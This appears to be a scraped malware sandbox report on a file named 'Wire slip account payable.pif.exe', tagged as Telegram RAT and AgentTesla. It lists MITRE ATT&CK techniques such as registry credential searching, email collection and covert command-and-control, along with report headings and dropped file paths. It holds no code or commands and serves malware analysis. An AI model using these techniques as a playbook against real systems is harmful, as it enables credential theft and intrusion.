Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Wire slip account payable.pif.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EQVRGq.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wire slip account payable.pif.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ypxrbms.yze.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lv25mif.uv5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5njz4ciw.ht5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adexolz3.0ml.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_li32tpuz.cnu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njlbv4uw.ugk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwi1m25g.lp3.psm1

Windows Analysis Report
Wire slip account payable.pif.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre